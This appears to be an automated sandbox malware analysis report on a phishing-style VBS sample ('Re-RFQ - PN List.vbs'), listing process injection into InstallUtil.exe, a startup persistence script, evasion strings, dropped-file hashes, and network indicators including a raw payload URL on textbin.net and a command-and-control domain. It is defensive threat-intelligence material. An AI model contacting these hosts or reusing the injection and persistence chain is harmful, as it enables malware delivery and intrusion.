Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 410000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1196008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 410000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10EE008

Source: 5arm45ue.dll.8.dr, GIT/NativeMethods.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: lvvchi0q.dll.15.dr, GIT/NativeMethods.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation

Windows Analysis Report Re-RFQ - PN List.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
Re-RFQ - PN List.vbs

Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: Yara match	File source: 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

IP	Domain	Country	ASN	ASN Name	Malicious
148.72.177.212	textbin.net	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
91.193.75.216	sky01.publicvm.com	Serbia	209623	DAVID_CRAIGGG	false
199.102.48.248	SQL8003.site4now.net	United States	35937	ZCOLO-LAS01US	false

Name	Malicious	Antivirus Detection	Reputation
https://textbin.net/raw/gia9ab2dg0	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
sky01.publicvm.com	false		high

ID:	627719
Product:	CloudBasic
Start time:	19:28:00
Start date:	16.05.2022
Sample:	Re-RFQ - PN List.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	867aa07dd614380e5943bccd70fee675
SHA1:	b97d664bc1f9f8f3ba2819f17154e4d32618734c
SHA256:	35d11d86e996833469ee713fce6ba52dbcdcf3211e36985182f47040c2166ac9

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\gia9ab2dg0.PS1	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	C95C4C5AD07F648F678ADC868D188027	9C66D7C88D8E72F776031AE1F7BF91ACC7008461	2EC7DE458E24B557DC21200CE248E299B89E9454A919464AEB6D3833EE10E8E3
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, 61480 bytes, 1 file	B9F21D8DB36E88831E5352BB82C438B3	4A3C330954F9F65A2F5FD7E55800E46CE228A3E2	998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	11D4E7F875B93256FA99070078197E64	CB8FB5470849A11A500F34E52BC29485B255237F	8F61FBFA1D7ED127BB5F6267CCA774F6F6936D5FC8AE1FA7AB84120A30E49D9A
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log	ASCII text, with CRLF line terminators	CC144808DBAF00E03294347EADC8E779	A3434FC71BA82B7512C813840427C687ADDB5AEA	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	BD615E1A2BC83828E536E020BD2D7DE9	340AF08B8BB60B52442FFE05FF8277C4276C8320	B5285E108F6ED9D942F56E840A5DFCA938E65FBC64A18729DFD96BE71D878416
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	5F17A93CDAD157820E394DC0F3997CF8	8BD19C2C6BC495B18D5D9236816FE3CE840AA5F6	FBC340A69AF22A3054D02AD484F41BD943A447769DE12A1612AF370918BEC203
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs	C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators	5B28648A4E188B0EBDF2D5EDCDA61624	FAF0BA6C2EF8D8184881EDA8A276796449969E1C	E92ACAFC5A9DD128B120809AAF76178275C3D22B13FB7CC2F0D9C624BEFED1B1
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	F8CC808956A1DBA06C132EF9B10E2903	06C2D7CCF2DA17AA7A7663E016447864264BB0AA	4144637C604F11CC6570E6A769692B3A30BCB3745E53024DDDCDD1C21D469DDB
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	989E1366E27A69F74476C3498AAAE89A	F9B7FDE729775B0644932B615AE04B3B008FFC9B	F31D2B71489BB3A7728094B0A102200A26F98CE1F2A76FCF8FDB1816D3C540F5
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	2AFA8A39A27D20C65D3D7BE409B88C5B	BB327D6676B22126720A52142D66CF23D114AFC2	17568FC0C9A4E5B0BE645618E4C9C90B723CD07B3801BE7E913D1ACB3503D0C2
C:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP	MSVC .res	D05383B7C687FC28B8F4FC0C91B2E8A5	397A3851B5EC340A5E60610A0EEE1F0D10FEE9CC	36EE338E7C0313F85F4EF34F8687C5349D850B5B3F20943E922CBD3AD453A3C9
C:\Users\user\AppData\Local\Temp\RES14F3.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ce, 9 symbols	ECDE385ADBB15C9C3A63910E48364F25	BE2542FE33E8E84732BA6EEF2B3DE109CD335E1A	C7455CEF351196818401F1E8E1FAF7FA9BA118AA70A3E87284EE0DC8FB1C54F7
C:\Users\user\AppData\Local\Temp\RESC9E1.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols	6DF2142D3D29C6B02DA33122B71E2368	262370695120C64CE289E3E4A3DDAE10935DBA67	47EC0D06A3398D519413A2BB248B88ECA2D8D4F0EB8E94DBD39A39532330C01E
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g4lgrl3.ws0.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bbucvlc.1j2.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1efweqf.5aa.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrik5clw.pjd.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzpdbdk.wsu.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t1u4d1.0tt.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP	MSVC .res	725CE01FB76BB92F32123E13137EB885	B64C8B9241F74CB1E649A1759505F1D37ACA5B45	B0BFFE5EF7081B7D4D41BFEB424EAEADA7B000965019B0D087B28D221D8B4627
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs	C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators	5B28648A4E188B0EBDF2D5EDCDA61624	FAF0BA6C2EF8D8184881EDA8A276796449969E1C	E92ACAFC5A9DD128B120809AAF76178275C3D22B13FB7CC2F0D9C624BEFED1B1
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	06858D5DB4A5FE6410BA9B19940A70A6	F84DDECC4A87C4851BB0B22DC251887FE8D5BACE	1F2487D01D1323D7E04B9D23E1CFC64C294705CFCE9A4AEA0E5DC2F17D8C4221
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	697745438041AE8BBAAC6AEE5CA9B839	52B1726BF56C630693188DA5F8AE23854C43037B	B7167470565733108E4C939E862F97A32F227D436205591F183517BB352BF646
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	92D68A93FBD01D2D5DABB45CBB2BCC97	105C621A2CAD71603095BE3E41A552202CDE1D24	7F076E2ED5C3DE4D0EF68D4D227D3D845FF3C82AED6C177A09DFFE99A25D7DC0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs	ASCII text, with CRLF line terminators	EA566D4E85B14D4B5D1AE1DC2F76622F	9A8CB117545D8951466C5F645E12714F8BE4B2A2	E7EBAAA98319F268F9079B57495C49947A05CB5C71A37FA1E34900C888523E5B
C:\Users\user\Documents\20220516\PowerShell_transcript.841618.MEqVT+yD.20220516192930.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	94146906D1D0B30F384BC9BDB5EAED3C	DE9A6BE3CC1B063615123095007AB4078649B864	8715CA2A8BC786C7C71DDFABC62BE0C393637F307355FA1AD3E1AEBF82258F64
C:\Users\user\Documents\20220516\PowerShell_transcript.841618.RBBMNgBb.20220516193001.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	744959ADC6EF14E3E878693258CBFC87	8B5628780C97BE3FA18942A482409C24E06DB32C	02CF9F4F16428F8727CDB090FAE0D69A25E0FA9D332F57E3D80ED5554D183D1F
C:\Users\user\Documents\20220516\PowerShell_transcript.841618.f5mU45le.20220516192941.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	187B7ED50370CBDDCBEF263BB3C21DE1	21F6021B58B1BA9EF1821002F8A3B980DF230A77	428616C73D1526A9890E94D2D16552142DB37D15597B55488273575302251BD8